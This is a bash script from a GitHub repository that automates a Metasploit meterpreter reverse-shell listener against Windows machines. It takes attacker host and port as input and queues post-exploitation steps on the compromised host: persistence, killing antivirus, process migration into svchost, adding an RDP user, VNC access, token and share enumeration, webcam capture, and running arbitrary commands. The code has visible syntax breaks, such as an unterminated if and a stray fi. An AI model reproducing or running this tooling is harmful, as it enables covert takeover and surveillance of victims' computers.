Iron-python-4.0/Multi PowerShell at main · 666DiabloAi666/Iron-python-4.0 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
#!/bin/bash
######Color##########
cyan='\e[0;46m'
green='\e[0;44m'
okegreen='\043[92m'
lightgreen='\e[1;42m'
white='\e[1;47m'
red='\e[1;41m'
yellow='\e[0;43m'
BlueF='\e[1;44m' #Biru
RESET="\043[00m" #normal
orange='\e[48;5;166m'
#######################
path=`pwd`
rcf=$path/script-listerning.rc
rcs=$path/auto-script.rc
payload_available="windows/meterpreter/reverse_tcp"
source $path/config
source $path/../configLanguage
######################
#language
if [ "$language" = "VN" ]; then
source $path/../../language/VietNamese/VN
source $path/../../language/VietNamese/vn_table
elif [ "$language" = "EN" ]; then
source $path/../../language/English/EN
source $path/../../language/English/en_table
fi
######### Functions #########
function windows {
	rm -rf $rcf
	touch $rcf
	rm -rf $rcs
	touch $rcs
	sleep 1

	echo "use exploit/multi/handler" > $rcf

	echo "1/  windows/meterpreter/reverse_tcp"
	echo "2/  windows/meterpreter/reverse_http"
	echo "o/ other"
	while true; do
		echo -ne "$choose_answer"
		read choose
		case $choose in
			1)
				echo "set PAYLOAD windows/meterpreter/reverse_http" >> $rcf
				set_handler;;
			2)
				echo "set PAYLOAD windows/meterpreter/reverse_http" >> $rcf
				set_handler;;
			o)
				guide
				while true; do
					echo -ne "death-note > "
					read value
					case $value in
						check);;
						search);;
						show);;
						use);;
						exit)	break;;


					esac
				done

					echo -ne ""
					read payload
					if [ "$payload" == "$payload_available" ]
		esac
	done
}

function set_handler {
				echo -ne "set lhost :"
				read LhOsT
				echo -ne "set lport :"
				read LpOrT
				echo -ne "	$message3"
				echo "set LHOST $LhOsT" >> $rcf
				echo "set LPORT $LpOrT" >> $rcf
				echo "set ExitOnSession false" >> $rcf
				echo -ne "	$message5"
				read a
					while [ "$a" != "yes" ] || [ "$a" != "no" ]; do
						if [ "$a" = "yes" ]; then
						autoscript
						echo "set AutoRunScript multi_console_command -r $rcs" >> $rcf
						break
						elif [ "$a" = "no" ]; then
						echo "$StartMulti"
						break
						fi
						echo -e "$error1";
						read a
					done
				echo "exploit -j -z" >> $rcf
					fi
}


function guide {
cat << !
		Cách dùng :
			check    :		Kiểm tra có Payload này trong danh sách không
			search	 :		Tìm kiếm Payload theo từ khóa
			show	 :		In ra tất cả các Payload theo HĐH hoặc theo ngôn ngữ lập trình
		    show all :	  	In ra tất cả các Payload trong danh sách
		    use 	 :		Sử dụng Payload
		    exit  	 :		Thoát
		Ví dụ :
			check windows/meterpreter/reverse_http
			search reverse_http
			show python
			use windows/meterpreter/reverse_http
!
}


function autoscript {
					##=== MIGRATE ==##
		function migrate {
			migrate_table
				while true; do
					echo -ne "$choose_answer"
					read answer
					case $answer in
					a)
						echo "run post/windows/manage/migrate" >> $rcs
			   			echo -e "=====> OK <=====";
						break;;
					b)
						echo "run post/windows/manage/archmigrate" >> $rcs
						echo -e "=====> OK <=====";
						break;;
					c)		echo -en "$question_aname"
							while true; do
							read yn
							case $yn in
							y|Y|Yes|yes|YES) echo -e "$import_aname"
								read aname; break;;
							n|N|No|no|NO) aname="svchost.exe" ; break ;;
							*) echo -e "$error1";
							esac
							done
							echo -en "$question_name"
							while true; do
							read yn
							case $yn in
							y|Y|Yes|yes|YES) echo -e "$import_name"
								read name; break;;
							n|N|No|no|NO) name="explorer.exe" ; break ;;
							*) echo -e "$error1";
							esac
							done
						echo "run post/windows/manage/priv_migrate ANAME=$aname NAME=$name nofail=true" >> $rcs
						echo -e "=====> OK <=====";
						break;;
					*) echo -e "$error1";
					esac
				done
 			}
		######################### Auto script ###########################################################
			echo -e "$ask_choose_script"
			table
			while true; do
			echo -ne "***"
			read choose_script
			case $choose_script in
			1)
			   echo -ne "$Newport"
			   read newLPORT
			   echo "run exploits/windows/local/persistence LPORT=$newLPORT" >> $rcs
			   echo -e "=====> OK <=====";;
			2) migrate;;
			3)
			   echo "run killav" >> $rcs
			   echo -e "=====> OK <=====";;
		        4)  echo -ne "$use"
				read Username
			   echo -ne "$pass"
				read Password
			   echo "run getgui -e" >> $rcs
			   echo "run getgui -u $Username -p $Password" >> $rcs
			   echo -e "=====> OK <=====";;
			5)
			   echo "run vnc" >> $rcs
			   echo "run vnc" >> $rcs
			   echo -e "=====> OK <=====";;
			6)
			   echo "run post/windows/gather/checkvm" >> $rcs
			   echo -e "=====> OK <=====";;
			7)
			   echo -ne "$Path_wallpaper"
			   read path_wallpaper
			   echo "run post/multi/manage/set_wallpaper WALLPAPER_FILE=$path_wallpaper" >> $rcs
			   echo -e "=====> OK <=====";;
			8) read auto_command
			   echo "run post/multi/general/execute COMMAND=$auto_command" >> $rcs
			   echo -e "=====> OK <=====";;
			9)
			   echo -ne "$input_path_lfile"
			   read path_lfile
			   echo -ne "$input_path_rfile"
			   read path_rfile
			   echo -ne "$input_proxy"
			   read proxy
			   echo -ne "$input_port"
			   read port
			if [ "$path_rfile" = "" ]; then
			   echo "run post/multi/manage/upload_injectCA LFILE=$path_lfile ProxyServer=$proxy ProxyPort=$port" >> $rcs
			else
			   echo "run post/multi/manage/upload_injectCA LFILE=$path_lfile RFILE=$rfile ProxyServer=$proxy ProxyPort=$port" >> $rcs
			fi
			   echo -e "=====> OK <=====";;
			10)
			   echo "run post/multi/gather/env" >> $rcs
			   echo -e "=====> OK <=====";;
			11)
			   echo "run post/windows/gather/enum_tokens" >> $rcs
			   echo -e "=====> OK <=====";;
			12)
			   echo "run post/windows/gather/enum_shares" >> $rcs
			   echo -e "=====> OK <=====";;
			13)
			   echo "run post/windows/gather/enum_applications" >> $rcs
			   echo -e "=====> OK <=====";;
			14)
			   echo "run post/windows/gather/enum_powershell_env" >> $rcs
			   echo -e "=====> OK <=====";;
			15)
			   echo "run post/multi/recon/local_exploit_suggester" >> $rcs
			   echo -e "=====> OK <=====";;
			16)
			   echo "run post/multi/gather/wlan_geolocate" >> $rcs
			   echo -e "=====> OK <=====";;
			17)
			   echo -ne "$Path_youtube"
			   read path_youtube
			   echo "run post/multi/manage/play_youtube VID=$path_youtube" >> $rcs
			   echo -e "=====> OK <=====";;
			18)
			   echo -ne "$Quality"
			   read QuaLiTy
			   echo "run post/windows/manage/webcam QUALITY=$QuaLiTy" >> $rcs
			   echo -e "=====> OK <=====";;
			99)
				break;;
			*) echo -e "$error1";
			esac
			done
			 echo -e "[$red*$RESET] Stating Listerning with metasploit"

}
service postgresql start
resize -s 40 105 > /dev/null
windows
cd ../../Victim/
#xterm -fa monaco -fs 13 -bg black -e msfconsole -r $rcf
msfconsole -r $rcf